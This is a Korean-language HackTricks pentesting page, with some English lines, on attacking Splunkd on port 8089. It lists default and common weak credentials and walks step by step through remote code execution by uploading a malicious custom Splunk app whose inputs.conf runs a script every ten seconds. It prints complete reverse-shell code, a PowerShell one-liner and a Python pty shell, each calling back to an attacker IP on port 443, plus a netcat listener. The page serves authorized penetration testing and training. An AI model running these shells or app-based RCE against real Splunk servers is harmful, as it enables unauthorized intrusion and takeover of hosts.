# 8089 - Pentesting Splunkd {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks * Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! * **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %} ## **κΈ°λ³Έ 정보** SplunkλŠ” **데이터 μˆ˜μ§‘, 뢄석 및 μ‹œκ°ν™”**μ—μ„œ μ€‘μš”ν•œ 역할을 ν•˜λŠ” **둜그 뢄석 도ꡬ**μž…λ‹ˆλ‹€. 초기 λͺ©μ μ€ **SIEM(λ³΄μ•ˆ 정보 및 이벀트 관리)** λ„κ΅¬λ‘œ μ‚¬μš©λ˜λŠ” 것이 μ•„λ‹ˆμ—ˆμ§€λ§Œ, **λ³΄μ•ˆ λͺ¨λ‹ˆν„°λ§** 및 **λΉ„μ¦ˆλ‹ˆμŠ€ 뢄석** λΆ„μ•Όμ—μ„œ 인기λ₯Ό μ–»μ—ˆμŠ΅λ‹ˆλ‹€. Splunk λ°°ν¬λŠ” μ’…μ’… **λ―Όκ°ν•œ 데이터**λ₯Ό μ €μž₯ν•˜λŠ” 데 μ‚¬μš©λ˜λ©°, μ‹œμŠ€ν…œμ„ μΉ¨ν•΄ν•  경우 잠재적인 κ³΅κ²©μžμ—κ²Œ **κ·€μ€‘ν•œ 정보 좜처**κ°€ 될 수 μžˆμŠ΅λ‹ˆλ‹€. **κΈ°λ³Έ 포트:** 8089 ``` PORT STATE SERVICE VERSION 8089/tcp open http Splunkd httpd ``` {% hint style="info" %} 기본적으둜 **Splunk μ›Ή μ„œλ²„λŠ” 포트 8000μ—μ„œ μ‹€ν–‰λ©λ‹ˆλ‹€**. {% endhint %} ## μ—΄κ±° ### 무료 버전 Splunk Enterprise μ²΄ν—˜νŒμ€ **60일 ν›„ 무료 λ²„μ „μœΌλ‘œ μ „ν™˜λ˜λ©°**, **인증이 ν•„μš”ν•˜μ§€ μ•ŠμŠ΅λ‹ˆλ‹€**. μ‹œμŠ€ν…œ κ΄€λ¦¬μžκ°€ Splunk의 μ²΄ν—˜νŒμ„ μ„€μΉ˜ν•˜μ—¬ ν…ŒμŠ€νŠΈν•˜λŠ” 것은 λ“œλ¬Έ 일이 μ•„λ‹ˆλ©°, μ΄λŠ” **κ·Έ ν›„ μžŠν˜€μ§€κ³€ ν•©λ‹ˆλ‹€**. μ΄λŠ” 인증이 μ „ν˜€ μ—†λŠ” 무료 λ²„μ „μœΌλ‘œ μžλ™ μ „ν™˜λ˜μ–΄ ν™˜κ²½μ— λ³΄μ•ˆ ꡬ멍을 μ΄ˆλž˜ν•©λ‹ˆλ‹€. 일뢀 쑰직은 μ˜ˆμ‚° μ œμ•½μœΌλ‘œ 인해 무료 버전을 선택할 수 있으며, μ‚¬μš©μž/μ—­ν•  관리가 μ—†λ‹€λŠ” κ²ƒμ˜ 의미λ₯Ό μ™„μ „νžˆ μ΄ν•΄ν•˜μ§€ λͺ»ν•  수 μžˆμŠ΅λ‹ˆλ‹€. ### κΈ°λ³Έ 자격 증λͺ… κ΅¬λ²„μ „μ˜ Splunkμ—μ„œλŠ” κΈ°λ³Έ 자격 증λͺ…이 **`admin:changeme`**둜, 둜그인 νŽ˜μ΄μ§€μ— νŽΈλ¦¬ν•˜κ²Œ ν‘œμ‹œλ©λ‹ˆλ‹€.\ κ·ΈλŸ¬λ‚˜ **μ΅œμ‹  λ²„μ „μ˜ Splunk**λŠ” **μ„€μΉ˜ κ³Όμ • 쀑에 자격 증λͺ…을 μ„€μ •ν•©λ‹ˆλ‹€**. κΈ°λ³Έ 자격 증λͺ…이 μž‘λ™ν•˜μ§€ μ•ŠλŠ” 경우, `admin`, `Welcome`, `Welcome1`, `Password123`와 같은 일반적인 μ•½ν•œ λΉ„λ°€λ²ˆν˜Έλ₯Ό 확인해 λ³Ό κ°€μΉ˜κ°€ μžˆμŠ΅λ‹ˆλ‹€. ### 정보 μ–»κΈ° Splunk에 λ‘œκ·ΈμΈν•˜λ©΄ **데이터λ₯Ό νƒμƒ‰ν•˜κ³ **, **λ³΄κ³ μ„œλ₯Ό μ‹€ν–‰ν•˜λ©°**, **λŒ€μ‹œλ³΄λ“œλ₯Ό μƒμ„±ν•˜κ³ **, Splunkbase λΌμ΄λΈŒλŸ¬λ¦¬μ—μ„œ **μ‘μš© ν”„λ‘œκ·Έλž¨μ„ μ„€μΉ˜**ν•˜κ³ , μ‚¬μš©μž μ •μ˜ μ‘μš© ν”„λ‘œκ·Έλž¨μ„ μ„€μΉ˜ν•  수 μžˆμŠ΅λ‹ˆλ‹€.\ μ½”λ“œλ₯Ό μ‹€ν–‰ν•  μˆ˜λ„ μžˆμŠ΅λ‹ˆλ‹€: SplunkλŠ” μ„œλ²„ μΈ‘ Django μ• ν”Œλ¦¬μΌ€μ΄μ…˜, REST μ—”λ“œν¬μΈνŠΈ, 슀크립트 μž…λ ₯ 및 κ²½κ³  μŠ€ν¬λ¦½νŠΈμ™€ 같은 μ—¬λŸ¬ 가지 λ°©λ²•μœΌλ‘œ **μ½”λ“œλ₯Ό μ‹€ν–‰**ν•  수 μžˆμŠ΅λ‹ˆλ‹€. Splunk μ„œλ²„μ—μ„œ 원격 μ½”λ“œ 싀행을 μ–»λŠ” 일반적인 방법은 슀크립트 μž…λ ₯을 μ‚¬μš©ν•˜λŠ” κ²ƒμž…λ‹ˆλ‹€. λ˜ν•œ, SplunkλŠ” Windows λ˜λŠ” Linux ν˜ΈμŠ€νŠΈμ— μ„€μΉ˜ν•  수 μžˆμœΌλ―€λ‘œ Bash, PowerShell λ˜λŠ” Batch 슀크립트λ₯Ό μ‹€ν–‰ν•˜κΈ° μœ„ν•΄ 슀크립트 μž…λ ₯을 생성할 수 μžˆμŠ΅λ‹ˆλ‹€. ### Shodan * `Splunk build` ## RCE ### μ‚¬μš©μž μ •μ˜ μ• ν”Œλ¦¬μΌ€μ΄μ…˜ λ§Œλ“€κΈ° μ‚¬μš©μž μ •μ˜ μ• ν”Œλ¦¬μΌ€μ΄μ…˜μ€ **Python, Batch, Bash λ˜λŠ” PowerShell 슀크립트**λ₯Ό μ‹€ν–‰ν•  수 μžˆμŠ΅λ‹ˆλ‹€.\ **Splunkμ—λŠ” Python이 μ„€μΉ˜λ˜μ–΄ μžˆμœΌλ―€λ‘œ**, **Windows** μ‹œμŠ€ν…œμ—μ„œλ„ Python μ½”λ“œλ₯Ό μ‹€ν–‰ν•  수 μžˆμŠ΅λ‹ˆλ‹€. [**이**](https://github.com/0xjpuff/reverse\_shell\_splunk) Splunk νŒ¨ν‚€μ§€λ₯Ό μ‚¬μš©ν•˜μ—¬ 도움을 받을 수 μžˆμŠ΅λ‹ˆλ‹€. 이 λ¦¬ν¬μ§€ν† λ¦¬μ˜ **`bin`** λ””λ ‰ν† λ¦¬μ—λŠ” [Python](https://github.com/0xjpuff/reverse\_shell\_splunk/blob/master/reverse\_shell\_splunk/bin/rev.py) 및 [PowerShell](https://github.com/0xjpuff/reverse\_shell\_splunk/blob/master/reverse\_shell\_splunk/bin/run.ps1) μ˜ˆμ œκ°€ μžˆμŠ΅λ‹ˆλ‹€. λ‹¨κ³„λ³„λ‘œ 진행해 λ³΄κ² μŠ΅λ‹ˆλ‹€. 이λ₯Ό λ‹¬μ„±ν•˜κΈ° μœ„ν•΄, λ¨Όμ € λ‹€μŒ 디렉토리 ꡬ쑰λ₯Ό μ‚¬μš©ν•˜μ—¬ μ‚¬μš©μž μ •μ˜ Splunk μ• ν”Œλ¦¬μΌ€μ΄μ…˜μ„ 생성해야 ν•©λ‹ˆλ‹€: ```shell-session tree splunk_shell/ splunk_shell/ β”œβ”€β”€ bin └── default ``` The **`bin`** λ””λ ‰ν† λ¦¬μ—λŠ” μš°λ¦¬κ°€ μ‹€ν–‰ν•  **슀크립트**κ°€ 포함될 κ²ƒμž…λ‹ˆλ‹€ (이 경우 **PowerShell** λ¦¬λ²„μŠ€ μ…Έ) 및 κΈ°λ³Έ λ””λ ‰ν† λ¦¬μ—λŠ” 우리의 `inputs.conf` 파일이 μžˆμ„ κ²ƒμž…λ‹ˆλ‹€. 우리의 λ¦¬λ²„μŠ€ 셸은 **PowerShell μ›λΌμ΄λ„ˆ**κ°€ 될 κ²ƒμž…λ‹ˆλ‹€: ```powershell $client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close( ``` The [inputs.conf](https://docs.splunk.com/Documentation/Splunk/latest/Admin/Inputsconf) νŒŒμΌμ€ Splunk에 **μ–΄λ–€ 슀크립트λ₯Ό 싀행할지** 및 기타 쑰건을 μ•Œλ €μ€λ‹ˆλ‹€. μ—¬κΈ°μ„œ μš°λ¦¬λŠ” 앱을 ν™œμ„±ν™”λ‘œ μ„€μ •ν•˜κ³  Splunk에 슀크립트λ₯Ό 10μ΄ˆλ§ˆλ‹€ μ‹€ν–‰ν•˜λ„λ‘ μ§€μ‹œν•©λ‹ˆλ‹€. 간격은 항상 초 λ‹¨μœ„μ΄λ©°, 이 섀정이 μ‘΄μž¬ν•  κ²½μš°μ—λ§Œ μž…λ ₯(슀크립트)이 μ‹€ν–‰λ©λ‹ˆλ‹€. ```shell-session cat inputs.conf [script://./bin/rev.py] disabled = 0 interval = 10 sourcetype = shell [script://.\bin\run.bat] disabled = 0 sourcetype = shell interval = 10 ``` μš°λ¦¬λŠ” μ• ν”Œλ¦¬μΌ€μ΄μ…˜μ΄ 배포될 λ•Œ μ‹€ν–‰λ˜κ³  PowerShell μ›λΌμ΄λ„ˆλ₯Ό μ‹€ν–‰ν•  `.bat` 파일이 ν•„μš”ν•©λ‹ˆλ‹€. λ‹€μŒ λ‹¨κ³„λŠ” `Install app from file`을 μ„ νƒν•˜κ³  μ• ν”Œλ¦¬μΌ€μ΄μ…˜μ„ μ—…λ‘œλ“œν•˜λŠ” κ²ƒμž…λ‹ˆλ‹€.
μ•…μ„± μ‚¬μš©μž μ •μ˜ 앱을 μ—…λ‘œλ“œν•˜κΈ° 전에 Netcat λ˜λŠ” [socat](https://linux.die.net/man/1/socat)을 μ‚¬μš©ν•˜μ—¬ λ¦¬μŠ€λ„ˆλ₯Ό μ‹œμž‘ν•©μ‹œλ‹€. ```shell-session sudo nc -lnvp 443 listening on [any] 443 ... ``` On the `Upload app` page, click on browse, choose the tarball we created earlier and click `Upload`. As **μš°λ¦¬κ°€ μ• ν”Œλ¦¬μΌ€μ΄μ…˜μ„ μ—…λ‘œλ“œν•˜λŠ” μ¦‰μ‹œ**, a **λ¦¬λ²„μŠ€ 셸이 μˆ˜μ‹ λ©λ‹ˆλ‹€** as the status of the application will automatically be switched to `Enabled`. #### Linux If we were dealing with a **Linux host**, we would need to **edit the `rev.py` Python script** before creating the tarball and uploading the custom malicious app. The rest of the process would be the same, and we would get a reverse shell connection on our Netcat listener and be off to the races. ```python import sys,socket,os,pty ip="10.10.14.15" port="443" s=socket.socket() s.connect((ip,int(port))) [os.dup2(s.fileno(),fd) for fd in (0,1,2)] pty.spawn('/bin/bash') ``` ### RCE & Privilege Escalation λ‹€μŒ νŽ˜μ΄μ§€μ—μ„œλŠ” 이 μ„œλΉ„μŠ€λ₯Ό μ•…μš©ν•˜μ—¬ κΆŒν•œμ„ μƒμŠΉμ‹œν‚€κ³  지속성을 μ–»λŠ” 방법에 λŒ€ν•œ μ„€λͺ…을 찾을 수 μžˆμŠ΅λ‹ˆλ‹€: {% content-ref url="../linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md" %} [splunk-lpe-and-persistence.md](../linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md) {% endcontent-ref %} ## References * [https://academy.hackthebox.com/module/113/section/1213](https://academy.hackthebox.com/module/113/section/1213) {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks * Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! * **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}